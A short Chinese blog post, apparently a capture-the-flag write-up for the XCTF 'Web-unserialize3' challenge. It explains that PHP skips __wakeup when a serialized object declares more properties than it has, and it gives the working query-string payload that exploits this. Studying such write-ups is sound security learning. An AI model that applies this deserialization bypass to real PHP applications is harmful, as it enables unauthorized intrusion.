当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。
__wakeup
payload:
?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}
打赏
多少都是心意!谢谢大家!!!
微信扫一扫,分享朋友圈
Or
手机扫一扫,精彩随身带
转载请注明 : 文章转载自 小翔博客 攻防世界Web-unserialize3
本文标题:攻防世界Web-unserialize3
本文链接:https://www.liuyixiang.com/post/96026.html
实力缔造非凡,成功绝非偶然!